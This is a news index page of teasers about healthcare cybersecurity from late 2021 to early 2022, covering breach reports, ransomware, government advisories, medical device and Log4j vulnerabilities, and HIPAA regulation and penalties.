The healthcare industry continues to face a considerable range of threats, with ransomware attacks and data breaches still highly prevalent. Throughout 2021, healthcare data breaches were being reported at a rate of almost 2 per day, and while there was a reduction in the number of ransomware attacks compared to 2020, ransomware remains a major threat with several ransomware gangs actively targeting the healthcare sector. In its Q4, 2021 Healthcare Cybersecurity Bulletin, released on Friday, the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) warned of some of the ongoing cyberattack trends that are expected to continue in Q1, 2022. Ransomware Law enforcement agencies in the United States and Europe have increased their efforts to bring the operators of ransomware operations and their affiliates to justice, with those efforts resulting in the arrests of key members of several ransomware groups. This year, in a rare act of cooperation between the United States and Russia, 14 suspected members of the notorious REvil ransomware gang...

Read More
CISA Urges All U.S. Orgs to Take Immediate Action to Protect Against Wiper Malware Attacks
Jan21

CISA Urges All U.S. Orgs to Take Immediate Action to Protect Against Wiper Malware Attacks

The DHS’ Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning to all organizations in the United States to take immediate steps to prepare for attempted cyberattacks involving a new wiper malware that has been used in targeted attacks on government agencies, non-profits, and information technology organizations in Ukraine. The malware – dubbed Whispergate – masquerades as ransomware and generates a ransom note when executed; however, the malware lacks the capabilities to allow files to be recovered. Whispergate consists of a Master Boot Record (MBR) wiper, a file corruption, and a Discord-based downloader. The MBR is the section of the hard drive that identifies how and where an operating system is located. Wiping the MBR will brick an infected device by making the hard drive inaccessible. The Microsoft Threat Intelligence Center (MSTIC) has recently performed an analysis of the new malware. The first stage of the malware, typically called stage1.exe, wipes the MBR and prevents the operating system from loading. The malware is executed when an infected...

Read More
December 2021 Healthcare Data Breach Report
Jan18

December 2021 Healthcare Data Breach Report

56 data breaches of 500 or more healthcare records were reported to the HHS’ Office for Civil Rights (OCR) in December 2021, which is a 17.64% decrease from the previous month. In 2021, an average of 59 data breaches were reported each month and 712 healthcare data breaches were reported between January 1 and December 31, 2021. That sets a new record for healthcare data breaches, exceeding last year’s total by 70 – An 10.9% increase from 2020. Across December’s 56 data breaches, 2,951,901 records were exposed or impermissibly disclosed – a 24.52% increase from the previous month. At the time of posting, the OCR breach portal shows 45,706,882 healthcare records were breached in 2021 – The second-highest total since OCR started publishing summaries of healthcare data breaches in 2009. Largest Healthcare Data Breaches in December 2021 Name of Covered Entity State Covered Entity Type Individuals Affected Breach Cause Oregon Anesthesiology Group, P.C. OR Healthcare Provider 750,500 Ransomware Texas ENT Specialists TX Healthcare Provider 535,489 Ransomware Monongalia Health System, Inc....

Read More
Disruption to Services at Maryland Department of Health Continues One Month After Ransomware Attack
Jan14

Disruption to Services at Maryland Department of Health Continues One Month After Ransomware Attack

Maryland Chief Information Security Officer (CISO) Chip Stewart has issued a statement confirming the disruption to services at the Maryland Department of Health (MDH) was the result of a ransomware attack. A security breach was detected in the early hours of December 4, 2021, and prompt action was taken to isolate the affected server and contain the attack. Stewart said the Department of Information Technology successfully isolated and contained the affected systems within a matter of hours, limiting the severity of the attack. “It is in part because of this swift response that we have not identified, to this point in our ongoing investigation, evidence of the unauthorized access to or acquisition of State data,” said Stewart in a statement issued on January 12, 2022. According to Stewart, there was an attempted distributed-denial-of-service (DDoS) attack shortly after the ransomware attack; however, that attack was not successful. Evidence gathered during the investigation of the ransomware and DDoS attacks indicates they were conducted by different threat actors. Stewart said he...

Read More
New HIPAA Regulations in 2022
Jan14

New HIPAA Regulations in 2022

It has been several years since new HIPAA regulations have been signed into law, but HIPAA changes in 2022 are expected. The last update to the HIPAA Rules was the HIPAA Omnibus Rule in 2013, which introduced new requirements mandated by the Health Information Technology for Economic and Clinical Health (HITECH) Act. OCR issued a Notice of Proposed Rulemaking (NPRM) on December 10, 2020, that proposed a slew of changes to the HIPAA Privacy Rule, and a Final Rule is expected to be issued in 2022; however, no date has yet been provided on when the 2022 HIPAA changes will take effect and become enforceable. Over the past few years, new HIPAA regulations under consideration include changes to how substance abuse and mental health information records are protected. As part of efforts to tackle the opioid crisis, the HHS is considering changes to both HIPAA and 42 CFR Part 2 regulations that serve to protect the privacy of substance abuse disorder patients who seek treatment at federally assisted programs to improve the level of care that can be provided. There have been calls from many...

Read More
New HIPAA Regulations in 2022
Jan14

New HIPAA Regulations in 2022

It has been several years since new HIPAA regulations have been signed into law, but HIPAA changes in 2022 are expected. The last update to the HIPAA Rules was the HIPAA Omnibus Rule in 2013, which introduced new requirements mandated by the Health Information Technology for Economic and Clinical Health (HITECH) Act. OCR issued a Notice of Proposed Rulemaking (NPRM) on December 10, 2020, that proposed a slew of changes to the HIPAA Privacy Rule, and a Final Rule is expected to be issued in 2022; however, no date has yet been provided on when the 2022 HIPAA changes will take effect and become enforceable. Over the past few years, new HIPAA regulations under consideration include changes to how substance abuse and mental health information records are protected. As part of efforts to tackle the opioid crisis, the HHS is considering changes to both HIPAA and 42 CFR Part 2 regulations that serve to protect the privacy of substance abuse disorder patients who seek treatment at federally assisted programs to improve the level of care that can be provided. There have been calls from many...

Read More
Critical Infrastructure Entities Warned About Cyberattacks by State-sponsored Russian APT Actors
Jan13

Critical Infrastructure Entities Warned About Cyberattacks by State-sponsored Russian APT Actors

The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have issued a joint advisory warning about the threat of Russian cyberattacks on critical infrastructure, including the healthcare, energy, government, and telecommunications sectors. “CISA, the FBI, and NSA encourage the cybersecurity community – especially critical infrastructure network defenders – to adopt a heightened state of awareness and to conduct proactive threat hunting,” explained the agencies in the advisory. The agencies have shared details of the tactics, techniques, and procedures (TTPs) commonly used by Russian state-sponsored advanced persistent threat (APT) actors to gain persistent access to networks for espionage and destructive cyberattacks. Russian APT actors use a variety of methods to breach perimeter defenses including spear phishing, brute force attacks against accounts and networks with weak security, and the exploitation of unpatched vulnerabilities, and have previously targeted vulnerable...

Read More
2020-2021 HIPAA Violation Cases and Penalties
Jan04

2020-2021 HIPAA Violation Cases and Penalties

The Department of Health and Human Services’ Office for Civil Rights (OCR) settled 19 HIPAA violation cases in 2020. More financial penalties were issued in 2020 than in any other year since the Department of Health and Human Services was given the authority to enforce HIPAA compliance. $13,554,900 was paid to OCR to settle the HIPAA violation cases. 2021 saw a slight reduction in the number of settlements and fines for HIPAA violations, with 14 enforcement actions announced by OCR. Even so, 2021 had the second-highest number of HIPAA fines of any year since OCR started enforcing compliance with the HIPAA Rules. While the number of penalties was still high in 2021, there was a sizeable reduction in penalty amounts which totaled $5,982,150 for the year, and $5,100,000 of that total came from just one enforcement action. The reason for this is that most of the penalties were for violations of the HIPAA Right of Access, and were in response to investigations of complaints filed by patients who had not been provided with timely access to their medical records, rather than penalties for...

Read More
Healthcare Supply Chain Association Issues Guidance on Medical Device and Service Cybersecurity
Dec31

Healthcare Supply Chain Association Issues Guidance on Medical Device and Service Cybersecurity

The Healthcare Supply Chain Association (HSCA) has issued guidance for healthcare delivery organizations, medical device manufacturers, and service suppliers on securing medical devices to make them more resilient to cyberattacks. The use of medical devices in healthcare has grown at an incredible rate and they are now relied upon to provide vital clinical functions that cannot be compromised without diminishing patient care. Medical devices are, however, often vulnerable to cyber threats and could be attacked to cause harm to patients, be taken out of service to pressure healthcare providers into meeting attackers’ extortion demands, or could be accessed remotely to obtain sensitive patient data. Medical devices are often connected to the Internet and can easily be attacked, so it is essential for proactive steps to be taken to improve security. The HSCA represents healthcare group purchasing organizations (GPOs) and advocates for fair procurement practices and education to improve the efficiency of purchases of healthcare goods and services and, as such, has a unique line of...

Read More
November 2021 Healthcare Data Breach Report
Dec21

November 2021 Healthcare Data Breach Report

The number of reported healthcare data breaches has increased for the third successive month, with November seeing 68 data breaches of 500 or more records reported to the HHS’ Office for Civil Rights – a 15.25% increase from October and well above the 12-month average of 56 data breaches a month. From January 1 to November 30, 614 data breaches were reported to the Office for Civil Rights. It is looking increasingly likely that this year will be the worst ever year for healthcare data breaches. The number of data breaches increased, but there was a sizable reduction in the number of breached records. Across the 68 reported breaches, 2,370,600 healthcare records were exposed, stolen, or impermissibly disclosed – a 33.95% decrease from the previous month and well below the 12-month average of 3,430,822 breached records per month. Largest Healthcare Data Breaches Reported in November 2021 In November, 30 data breaches of 10,000 or more records were reported to the HHS’ Office for Civil Rights, and 4 of those breaches resulted in the exposure/theft of more than 100,000 records. The...

Read More
New Data Reveals Extent of Ransomware Attacks on the Healthcare Sector
Dec20

New Data Reveals Extent of Ransomware Attacks on the Healthcare Sector

The CyberPeace Institute has released new data on cyberattacks on the healthcare industry. According to the latest figures, 295 cyberattacks are known to have been conducted on the healthcare sector in the past 18 months between June 2, 2020, and December 3, 2021. The attacks have been occurring at a rate of 3.8 per week and have occurred in 35 countries. Those attacks include 263 incidents that have either been confirmed as ransomware attacks (165) or are suspected of involving ransomware (98), with those attacks occurring in 33 countries at a rate of 3.4 incidents a week. Over the past 18 months, at least 39 different ransomware groups have conducted ransomware attacks on the healthcare sector. Those attacks have mostly been on patient care services (179), followed by pharma (35), medical manufacturing & development (26), and other medical organizations (23). The CyberPeace Institute studied darknet publications, correspondence with ransomware gangs, and interviews and identified 12 ransomware groups that had stated they would not conduct attacks on the healthcare sector...

Read More
Third Version of Log4j Released to Fix High Severity DoS Vulnerability
Dec20

Third Version of Log4j Released to Fix High Severity DoS Vulnerability

The original vulnerability identified in Log4j (CVE-2021-44228) that sent shockwaves around the world due to its seriousness, ease of exploitation, and the extent to which it impacts software and cloud services, is not the only vulnerability in the Java-based logging utility. After releasing version 2.15.0 to fix the flaw, it was determined that version 2.15.0 was still vulnerable in certain non-default configurations due to an incomplete patch. The new vulnerability is tracked as CVE-2021-45046 and was fixed in version 2.16.0 of Log4j. Initially, the vulnerability was assigned a CVSS score of 3.7 (low severity); however, the severity score has since been increased to critical (CVSS 9.0), as while this flaw was initially reported as a denial-of-service bug, it was later determined that it could be exploited to allow data exfiltration and remote code execution. According to Apache, “When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious...

Read More
Learnings from a Major Healthcare Ransomware Attack
Dec13

Learnings from a Major Healthcare Ransomware Attack

One of the most serious healthcare ransomware attacks occurred in Ireland earlier this year. The Health Service Executive (HSE), the Republic of Ireland’s national health system, suffered a major attack that resulted in Conti ransomware being deployed and forced its National Healthcare Network to be taken offline. That meant healthcare professionals across the country were prevented from accessing all HSE IT systems, including clinical care systems, patient records, laboratory systems, payroll, and other clinical and non-clinical systems which caused major disruption to healthcare services across the country. Following the attack, the HSE Board commissioned PricewaterhouseCoopers (PWC) to conduct an independent post-incident review into the attack to establish the facts related to technical and operational preparedness and the circumstances that allowed the attackers to gain access to its systems, exfiltrate sensitive data, encrypt files, and extort the HSE. Cybersecurity Failures that are Common in the Healthcare Industry PWC’s recently published report highlights a number of...

Read More
Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild
Dec13

Max-Severity Apache Log4j Zero-day Vulnerability Extensively Exploited in the Wild

A maximum-severity vulnerability has been identified in Apache Log4j, an open-source Java-based logging library used by many thousands of organizations in their enterprise applications and by many cloud services. The vulnerability, dubbed Log4Shell and tracked as CVE-2021-44228, is serious as they come, with some security researchers claiming the flaw is the most serious to be discovered in the past decade due to its ease of exploitation and the sheer number of enterprise applications and cloud services that are affected. The vulnerability can be exploited without authentication to achieve remote code execution and take full control of vulnerable systems. The vulnerability affects Apache Log4j between versions 2.0 to 2.14.1, and has been fixed in version 2.15.0. The advice is to ensure the upgrade is performed immediately as a proof-of-concept exploit for the flaw is in the public domain, extensive scans are being performed for vulnerable systems, and there have been many cases of the flaw being exploited in the wild. Some reports suggest the improper input validation bug has been...

Read More
High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products
Dec10

High-Severity Authentication Bug Identified in Hillrom Welch Allyn Cardio Products

A high severity vulnerability has been identified in certain Hillrom Welch Allyn Cardio products that allows accounts to be accessed without a password. The vulnerability is an authentication bypass issue that exists when the Hillrom cardiology products have been configured to use single sign-on (SSO). The vulnerability allows the manual entry of all active directory (AD) accounts provisioned within the application, and access will be granted without having to provide the associated password. That means a remote attacker could access the application under the provided AD account and gain all privileges associated with the account. The vulnerability is tracked as CVE-2021-43935 and has been assigned a CVSS v3 base score of 8.1 out of 10. According to Hillrom, the vulnerability affects the following Hillrom Welch Allyn cardiology products: Welch Allyn Q-Stress Cardiac Stress Testing System: Versions 6.0.0 through 6.3.1 Welch Allyn X-Scribe Cardiac Stress Testing System: Versions 5.01 through 6.3.1 Welch Allyn Diagnostic Cardiology Suite: Version 2.1.0 Welch Allyn Vision Express:...

Read More
SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances
Dec09

SonicWall Recommends Immediate Firmware Upgrade to Fix Critical Flaws in SMA 100 Series Appliances

SonicWall has released new firmware for its Secure Mobile Access (SMA) 100 series remote access appliances that fixes 8 vulnerabilities including 2 critical and 4 high-severity flaws. Vulnerabilities in SonicWall appliances are attractive to threat actors and have been targeted in the past in ransomware attacks. While there are currently no known cases of the latest batch of vulnerabilities being exploited in the wild, there is a high risk of these vulnerabilities being exploited if the firmware is not updated promptly. SMA 100 series appliances include the SonicWall SMA 200, 210, 400, 410, and 500v secure access gateway products, all of which are affected. The most serious vulnerabilities are buffer overflow issues which could be exploited remotely by an unauthenticated attacker to execute code on vulnerable appliances. These are CVE-2021-20038, an unauthenticated stack-based buffer overflow vulnerability (CVSS score of 9.8), and CVE-2021-20045, which covers multiple unauthenticated file explorer heap-based and stack-based buffer overflow issues (CVSS score 9.4). A further...

Read More
Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access
Dec06

Guidance Issued for Healthcare CISOs on Identity, Interoperability, and Patient Access

The Health Information Sharing and Analysis Center (Health-ISAC) has released guidance for Chief Information Security Officers (CISOs) on adopting an identity-centric approach to enabling secure and easy access to patient data to meet the interoperability, patient access, and data sharing requirements of the 21st Century Cures Act. New federal regulations tied to the 21st Century Cures Act call for healthcare organizations to provide patients with easy access to their healthcare data and ensure patients can easily share their electronic health information (EHI) data wherever, whenever, and with whomever they want. The failure of a healthcare organization to implement systems to support patient access and interoperability could be considered information blocking and would be subject to fines and penalties. The new federal requirements are for healthcare providers and insurers to allow data sharing through Application Programming Interfaces (APIs) that operate on the Fast Healthcare Interoperability and Resources (FHIR) standard. Healthcare providers and insurers are required to...

Read More
Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks
Dec06

Biomanufacturing Sector Warned of High Risk of Tardigrade Malware Attacks

A highly sophisticated malware capable of aggressively spreading within networks is being used in targeted attacks on the biomanufacturing sector. The malware has been named Tardigrade by security researchers and initial research suggests it may be a variant of SmokeLoader – A commonly used malware loader and backdoor, although SmokeLoader and Tardigrade malware are quite distinct. The sophisticated nature of the malware coupled with the targeted attacks on vaccine manufacturers and their partners strongly suggest the malware was developed and is being used by an Advanced Persisted Threat (APT) actor. The malware was first detected being used in attacks on the biomanufacturing sector in the spring of 2021 when an infection was discovered at a large U.S. biomanufacturing facility. The malware was identified again in an attack on a biomanufacturing firm in October 2021 and it is believed to have been used in attacks on several firms in the sector. In contrast to SmokeLoader, which requires instructions to be sent to the malware from its command-and-control infrastructure, Tardigrade...

Read More
APT Actors Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells
Dec03

APT Actors Exploiting Zoho ManageEngine ServiceDesk Plus to Deliver Webshells

An APT actor that was targeting a vulnerability in the enterprise password management and single sign-on solution Zoho ManageEngine ADSelfService Plus has started exploiting another critical vulnerability in a different Zoho product, the IT helpdesk and asset management solution Zoho ManageEngine ServiceDesk Plus. The APT group had been exploiting a critical vulnerability in ManageEngine ADSelfService Plus tracked as CVE-2021-40539, which affects Zoho ManageEngine ADSelfService Plus version 6113 and prior, and is a REST API authentication bypass that can be exploited to allow remote code execution. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) issued a joint advisory on December 2, 2021, about a different vulnerability being exploited by the APT actor. The vulnerability, CVE-2021-44077, affects all versions of Zoho ManageEngine ServiceDesk Plus (on-premises) prior to version 11306. The vulnerability is related to RestAPI URLs in a servlet and ImportTechnicians in the Struts configuration. Successful exploitation of the...

Read More
HHS Launches 405(d) Program Website Providing Resources to Help Mitigate Healthcare Cybersecurity Threats
Dec03

HHS Launches 405(d) Program Website Providing Resources to Help Mitigate Healthcare Cybersecurity Threats

The Department of Health and Human Services has launched a new website that offers advice and resources to help the healthcare and public health sector mitigate cybersecurity threats. The website was created as part of the HHS 405(d) Aligning Health Care Industry Security Approaches Program, which was established in response to the Cybersecurity Act of 2015. The Cybersecurity Act of 2015 called for the HHS to establish the program and a Task Group to enhance cybersecurity and align industry approaches by developing a common set of voluntary, consensus-based, and industry-led cybersecurity guidelines, practices, methodologies, procedures and processes that healthcare organizations can use. More than 150 individuals from industry and the federal government have collaborated under the program and provided insights into how best to mitigate cyberthreats. The new website supports the motto, Cyber Safety is Patient Safety, and provides videos and other educational material to raise awareness of pertinent threats along with vetted cybersecurity resources to drive behavioral change and...

Read More
CISA Publishes Mobile Device Cybersecurity Checklist for Organizations
Nov30

CISA Publishes Mobile Device Cybersecurity Checklist for Organizations

The Cybersecurity and Infrastructure Security Agency (CISA) has published new guidance for enterprises to help them secure mobile devices and safely access enterprise resources using mobile devices. The Enterprise Mobility Management (EMM) system checklist has been created to help businesses implement best practices to mitigate vulnerabilities and block threats that could compromise mobile devices and the enterprise networks to which they connect. The steps outlined in the checklist are easy for enterprises to implement and can greatly improve mobile device security and allow mobile devices to be safely used to access business networks. CISA recommends a security-focused approach to mobile device management. When selecting mobile devices that meet enterprise requirements, an assessment should be performed to identify potential supply chain risks. The Mobile Device Management (MDM) system should be configured to update automatically to ensure it is always running the latest version of the software and patches are applied automatically to fix known vulnerabilities. A policy should be...

Read More
Increased Risk of Cyber and Ransomware Attacks Over Thanksgiving Weekend
Nov23

Increased Risk of Cyber and Ransomware Attacks Over Thanksgiving Weekend

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have warned organizations in the United States about the increased risk of cyberattacks over Thanksgiving weekend. Cyber threat actors are often at their most active during holidays and weekends, as there are likely to be fewer IT and security employees available to detect attempts to breach networks. Recent attacks have demonstrated holiday weekends are prime time for cyber threat actors, with Las Vegas Cancer Center one of the most recent victims of such an attack on the Labor Day weekend. The warning applies to all organizations and businesses, but especially critical infrastructure firms. Cyber actors around the world may choose Thanksgiving weekend to conduct attacks to disrupt critical infrastructure and conduct ransomware attacks. CISA and the FBI are urging all entities to take steps to ensure risk is effectively mitigated ahead of the holiday weekend to help prevent them from becoming the next victim of a costly cyberattack. Steps that should be taken immediately...

Read More
HC3 Warns Healthcare Sector About Risk of Zero-day Attacks
Nov23

HC3 Warns Healthcare Sector About Risk of Zero-day Attacks

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief warning the healthcare and public health sector about an increase in financially motivated zero-day attacks, outlining mitigation tactics that should be adopted to reduce risk to a low and acceptable level. A zero-day attack leverages a vulnerability for which a patch has yet to be released. The vulnerabilities are referred to as zero-day, as the developer has had no time to release a patch to correct the flaw. Zero-day attacks are those where a threat actor has exploited a zero-day vulnerability using a weaponized exploit for the flaw. Zero-day vulnerabilities are exploited in attacks on all industry sectors and are not only a problem for the healthcare industry.  For instance, in 2010, exploits were developed for four zero-day vulnerabilities in the “Stuxnet” attack on the Iranian nuclear program, which caused Iranian centrifuges to self-destruct to disrupt Iran’s nuclear program. More recently in 2017, a zero-day vulnerability was exploited to deliver the Dridex banking Trojan. While it...

Read More
Vulnerabilities Identified in Philips IntelliBridge, Patient Information Center and Efficia Patient Monitors
Nov19

Vulnerabilities Identified in Philips IntelliBridge, Patient Information Center and Efficia Patient Monitors

Five vulnerabilities have been identified that affect the IntelliBridge EC 40 and EC 80 Hub, Philips Patient Information Center iX, and Efficia CM series patient monitors. IntelliBride EC 40 and EC 80 Hub Two vulnerabilities have been identified that affect C.00.04 and prior versions of the IntelliBridge EC 40 and EC 80 Hub. Successful exploitation of the vulnerabilities could allow an unauthorized individual to execute software, change system configurations, and update/view files that may include unidentifiable patient data. The first vulnerability is due to the use of hard-coded credentials – CVE-2021-32993 – in the software for its own inbound authentication, outbound communication to external components, or the encryption of internal data. The second vulnerability is an authentication bypass issue – CVE-2021-33017. While the standard access path of the product requires authentication, an alternative path has been identified that does not require authentication. Both vulnerabilities have been assigned a CVSS v3 severity score of 8.1 out of 10. Philips has not yet issued an...

Read More
Iranian APT Actors Actively Exploiting Microsoft Exchange and Fortinet Vulnerabilities
Nov18

Iranian APT Actors Actively Exploiting Microsoft Exchange and Fortinet Vulnerabilities

A joint cybersecurity advisory has been issued by the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Australian Cyber Security Centre (ACSC), and the United Kingdom’s National Cyber Security Centre (NCSC) warning of ongoing attacks by an Iranian Advanced Persistent Threat (APT) actor on critical infrastructure sectors including the healthcare and public health sector. Cyber actors known to be associated with the Iranian government have been exploiting vulnerabilities in the Fortinet FortiOS operating system since at least March 2021, and have been leveraging a Microsoft Exchange ProxyShell vulnerability since October 2021 to gain access to targets’ networks. The attacks appear to be focused on exploiting the vulnerabilities rather than any specific sector. Once the vulnerabilities have been exploited to gain a foothold in networks, the threat actor can perform a range of follow-on operations, which have included data exfiltration and data encryption. The threat actors are exploiting three vulnerabilities in Fortinet Devices –...

Read More
82% Of Healthcare Organizations Have Experienced an IoT Cyberattack in the Past 18 Months
Nov18

82% Of Healthcare Organizations Have Experienced an IoT Cyberattack in the Past 18 Months

A new study conducted by Medigate and CrowdStrike has highlighted the extent to which healthcare Internet of Things (IoT) devices are being targeted by threat actors and warns about the worrying state of IoT security in the healthcare industry. The number of IoT devices being used in healthcare has increased significantly in recent years as connected health drives a revolution in care delivery. Healthcare providers are increasingly reliant on IoT devices to perform a range of essential functions, and while the devices offer huge clinical benefits, full consideration should be given to cybersecurity. Cyber threat actors have disproportionately targeted healthcare organizations for many years due to the high value of healthcare data, the ease at which it can be monetized, and the relatively poor cybersecurity defenses in healthcare compared to other industry sectors. The rapid adoption of IoT devices has resulted in a major increase in the attack surface which gives cyber actors even more opportunities to conduct attacks. Further, IoT devices often have weaker cybersecurity controls...

Read More
Patients Unaware of the Extent of Healthcare Cyberattacks and Data Theft
Nov16

Patients Unaware of the Extent of Healthcare Cyberattacks and Data Theft

A recent survey conducted by the unified asset visibility and security platform provider Armis has explored the state of cybersecurity in healthcare and the security risks that are now faced by healthcare organizations. The survey was conducted by Censuswide on 400 IT professionals at healthcare organizations across the United States, and 2,000 U.S. patients to obtain their views on cybersecurity and data breaches in healthcare. The survey confirmed cyber risk is increasing, with 85% of respondents saying cyber risk has increased over the past 12 months. Ransomware gangs have targeted the healthcare industry over the past 12 months, and many of those attacks have succeeded. 58% of the surveyed IT professionals said their organization had experienced a ransomware attack in the past 12 months. Ransomware attacks were viewed as a cause of concern by 13% of IT security pros, indicating most are confident that they will be able to recover data in the event of an attack. However, data breaches that result in the loss of patient data were a major worry, with 52% of IT pros rating data...

Read More
Medical Devices Affected by 13 Siemens Nucleus RTOS TCP/IP Stack Vulnerabilities
Nov15

Medical Devices Affected by 13 Siemens Nucleus RTOS TCP/IP Stack Vulnerabilities

13 vulnerabilities have been identified in the Siemens Nucleus RTOS TCP/IP stack that could potentially be exploited remotely by threat actors to achieve arbitrary code execution, conduct a denial-of-service attack, and obtain sensitive information. The vulnerabilities, dubbed NUCLEUS:13, affect the TCP/IP stack and related FTP and TFTP services of the networking component (Nucleus NET) of the Nucleus Real-Time Operating System (RTOS), which is used in many safety-critical devices. In healthcare, Nucleus is used in medical devices such as anesthesia machines and patient monitors. One critical vulnerability has been identified that allows remote code execution which has a CVSS v3 severity score of 9.8 out of 10. Ten of the vulnerabilities are rated high severity flaws, with CVSS scores ranging from 7.1 to 8.8. There are also two medium-severity flaws with CVSS scores of 6.5 and 5.3. The vulnerabilities were identified by security researchers at Forescout Research Labs, with assistance provided by researchers at Medigate. The vulnerabilities affect the following Nucleus RTOS...

Read More
DOJ Indicts 2 REvil Ransomware Gang Members: State Department Now Offering $10 Million Reward for Information
Nov11

DOJ Indicts 2 REvil Ransomware Gang Members: State Department Now Offering $10 Million Reward for Information

The United States Department of Justice (DoJ) has unsealed indictments charging two individuals for their roles in multiple REvil/Sodinokibi ransomware attacks on organizations in the United States. Ukrainian national, Yaroslav Vasinskyi, 22, has been indicted on multiple charges related to the ransomware attacks, including the supply chain attack that saw Kaseya’s Virtual System/Server Administrator (VSA) platform compromised. That attack involved ransomware being deployed on the systems of around 40 managed service providers and 1,500 downstream businesses. Russian national, Yevgeniy Igoryevich Polyanin, 28, has been indicted for his role in multiple ransomware attacks, including attacks on government entities in Texas. The DoJ says it seized $6.1 million in ransom payments that were paid to cryptocurrency wallets linked to Polyanin. The DoJ has indicted several individuals believed to have been involved in cyberattacks in the United States; however, those individuals can only face trial if they are located, arrested, and extradited to the United States. Many ransomware threat...

Read More
HC3: Cobalt Strike Penetration Testing Framework Increasingly Used in Cyberattacks on Healthcare Organizations
Nov10

HC3: Cobalt Strike Penetration Testing Framework Increasingly Used in Cyberattacks on Healthcare Organizations

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a threat brief for the healthcare industry warning about the use of the Cobalt Strike penetration testing tool by cyber threat actors. Cobalt Strike is a powerful red team tool used by penetration testers when conducting risk and vulnerability assessments, but it can also be abused and is increasingly being used by cyber threat actors in attacks on the healthcare and public health sector. Cobalt Strike can be used for reconnaissance to gain valuable information about the target infrastructure to allow threat actors to determine the best use of their time when attacking healthcare networks. The system profiler function can be used to discover client-side applications used by a target and provides version information. The system profiler starts a local web server, fingerprints visitors, identifies internal IP addresses behind a proxy, and obtains reconnaissance data from the weblog, applications, and provides information on targets. Cobalt Strike includes a spear phish tool that can be used to create and send...

Read More
3 Medium Severity Vulnerabilities Identified in Philips MRI Solutions
Nov10

3 Medium Severity Vulnerabilities Identified in Philips MRI Solutions

Three medium severity vulnerabilities have been identified in Philips MRI products which, if exploited, could allow an unauthorized individual to run software, modify the device configuration, view and updates files, and export data, including protected health information (PHI), to an untrusted environment. Aguilar found insufficient access controls which fail to restrict access by unauthorized individuals (CVE-2021-3083), the software assigns an owner who is outside the intended control sphere (CVE-2021-3085), and sensitive data is exposed to individuals who should not be provided with access (CVE-2021-3084). Each of the vulnerabilities has been assigned a CVSS V3 base score of 6.2 out of 10. The vulnerabilities were identified by Secureworks Adversary Group consultant, Michael Aguilar, and affect Philips MRI 1.5T: Version 5.x.x, and MRI 3T: Version 5.x.x. Aguilar reported the flaws to Philips and a patch has been scheduled for release by October 2022. In the meantime, Philips recommends implementing mitigating measures to prevent the vulnerabilities from being exploited. The...

Read More
Chinese APT Group Compromised Healthcare Organizations by Exploiting Zoho Password Management Platform Flaw
Nov08

Chinese APT Group Compromised Healthcare Organizations by Exploiting Zoho Password Management Platform Flaw

An advanced persistent threat (APT) actor has been conducting an espionage campaign that has seen the systems of at least 9 organizations compromised. The campaign targeted organizations in a range of critical sectors, including healthcare, energy, defense, technology, and education. The campaign was identified by security researchers at Palo Alto Networks and while the identity of the hacking group has yet to be confirmed, the researchers believe the attacks were most likely conducted by the Chinese state-sponsored hacking group APT27, aka Iron Tiger, Emissary Panda, TG-3390, and LuckyMouse based on the use of hacking tools and techniques that match previous APT27 activity. The campaign exploited a critical vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus, an enterprise password management and single sign-on solution developed by Zoho. Successful exploitation of the flaw allows remote attackers to execute arbitrary code and take full control of vulnerable systems. On September 17, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a...

Read More
Is G Suite HIPAA Compliant?
Nov03

Is G Suite HIPAA Compliant?

Is G Suite HIPAA compliant? Can G Suite be used by HIPAA-covered entities without violating HIPAA Rules? Google has developed G Suite to include privacy and security protections to keep data secure, and those protections are of a sufficiently high standard to meet the requirements of the HIPAA Security Rule. Google will also sign a business associate agreement (BAA) with HIPAA covered entities. So, is G Suite HIPAA compliant? G Suite can be used without violating HIPAA Rules, but HIPAA compliance is more about the user than the cloud service provider. Making G Suite HIPAA Compliant (by default it isn’t) As with any secure cloud service or platform, it is possible to use it in a manner that violates HIPAA Rules. In the case of G Suite, all the safeguards are in place to allow HIPAA covered entities to use G Suite in a HIPAA compliant manner, but it is up to the covered entity to ensure that G Suite is configured correctly. It is possible to use G Suite and violate HIPAA Rules. Obtain a BAA from Google One important requirement of HIPAA is to obtain a signed, HIPAA-compliant...

Read More
FBI: Ransomware Gangs Exploiting Corporate Financial Events to Facilitate Extortion
Nov03

FBI: Ransomware Gangs Exploiting Corporate Financial Events to Facilitate Extortion

Ransomware gangs often use double extortion tactics to encourage victims to pay the ransom. In addition to file encryption, sensitive data are stolen and a threat is issued to sell or publish the data if the ransom is not paid. The Federal Bureau of Investigation (FBI) has recently issued a private industry notification warning of a new extortion tactic, where ransomware gangs target companies and organizations that are involved in significant time-sensitive financial events, steal sensitive financial data, then threaten to publish that information if payment is not made. Ransomware gangs conduct extensive research on their victims before launching an attack, which includes gathering publicly available data and nonpublic material. The attacks are then timed to coincide with the release of quarterly earnings reports, SEC filings, initial public offerings, and merger and acquisition activity, with the release of information having the potential to significantly affect the victim’s stock value. “During the initial reconnaissance phase, cyber criminals identify non-publicly...

Read More
42% of Healthcare Organizations Have Not Developed an Incident Response Plan
Nov02

42% of Healthcare Organizations Have Not Developed an Incident Response Plan

